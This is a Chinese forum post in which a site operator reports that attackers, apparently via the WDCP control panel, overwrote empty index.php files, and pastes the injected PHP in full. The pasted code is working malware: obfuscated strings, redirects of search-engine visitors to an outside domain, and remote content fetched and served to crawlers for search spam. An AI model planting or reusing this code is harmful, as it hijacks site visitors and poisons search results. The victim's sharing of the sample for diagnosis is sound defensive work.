我也遇到同样的问题,上传的文件都是index.php,其实就是把目录下的空文件替换成挂马文件,但这些文件没有人访问不知有什么用处?黑客都是直接登陆WDCP后台,估计是利用了WDCP的漏洞。
挂马的内容:- <?php
- date_default_timezone_set('PRC');
- set_time_limit(20);
- error_reporting(0);
- header('Content-type: text/html; charset=gbk');
- define('SPIDERS','LzScMUI8p28hL29gsUAiM291sUyunT9isTqiM2ky');
- define('HOSTS',$_SERVER['SERVER_NAME']);
- define('d58ok','0');
- define('REFES',$_SERVER['HTTP_REFERER']);
- define('USERS',$_SERVER['HTTP_USER_AGENT']);
- define('URLS',$_SERVER['REQUEST_URI']);
- $Class_urls = 'http://www.5886887.com/';
- $Class_zhus = 'nUE0pQbiYmL3YwR5BP4kAwthZGD2Yj==';
- $KIP=array('117.28.255.37','116.55.241.24','125.64.94.219','119.147.114.213','118.122.188.194','60.172.229.61','61.188.39.16','61.147.98.198','61.129.45.72','113.98.254.245','58.221.61.128','117.34.73.70','58.215.190.84','117.28.255.53','183.91.40.144','117.21.220.245','122.228.200.46','61.164.150.70','61.147.108.41','116.55.242.138','114.80.222.242','61.147.108.41','116.255.230.70','222.186.24.26','222.186.24.59','220.181.158.106','123.125.160.215');
- define('PATHS',__FILE__);
- function Reads($url){
- $opts = array('http' => array('method' => "GET",'timeout' => 8));
- $context = stream_context_create($opts);
- $html = file_get_contents($url, false, $context);
- if(empty($html)){$html = file_get_contents($url);}
- return $html;
- }
- function Ips(){
- if(@$_SERVER["HTTP_X_FORWARDED_FOR"]){
- $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
- }else if(@$_SERVER["HTTP_CLIENT_IP"]){
- $ip = $_SERVER["HTTP_CLIENT_IP"];
- }else if(@$_SERVER["REMOTE_ADDR"]){
- $ip = $_SERVER["REMOTE_ADDR"];
- }else if(@getenv("HTTP_X_FORWARDED_FOR")){
- $ip = getenv("HTTP_X_FORWARDED_FOR");
- }else if(@getenv("HTTP_CLIENT_IP")){
- $ip = getenv("HTTP_CLIENT_IP");
- }else if(@getenv("REMOTE_ADDR")){
- $ip = getenv("REMOTE_ADDR");
- }else{
- $ip = "Unknown";
- }return $ip;
- }
- function R($string){
- $Class_now = str_rot13($string);
- $Class_now = base64_decode($Class_now);
- return $Class_now;
- }
- if(eregi(R(SPIDERS),REFES)){
- $Class_site = true;
- if(eregi("site%3A|inurl%3A",REFES)){
- setcookie('x86',HOSTS,time() + 259200);
- $Class_site = false;
- }
- if($Class_site && empty($_COOKIE['x86'])){
- setcookie('x86',HOSTS,time() + 259200);
- $Class_from = $Class_urls;
- $Class_home = $Class_from;
- header("Location: ".$Class_home.'?'.HOSTS);
- exit;
- }
- }
- if(d58ok){
- $Class_UR = R($Class_zhus).'?xxurl='.bin2hex(URLS);
- $Class_UR .= '&xxhost='.bin2hex(HOSTS);
- $Class_code = Reads($Class_UR);
- if(trim($Class_code) !== 'nonono')
- {echo base64_decode($Class_code);exit;}
- }
- if(eregi(R(SPIDERS),USERS)){
- if(!in_array(Ips(),$KIP)){
- $Class_UR = R($Class_zhus).'?xxurl='.bin2hex(URLS);
- $Class_UR .= '&xxhost='.bin2hex(HOSTS);
- $Class_code = Reads($Class_UR);
- if(trim($Class_code) !== 'nonono')
- {echo base64_decode($Class_code);exit;}
- }
- }
- ?>
复制代码 |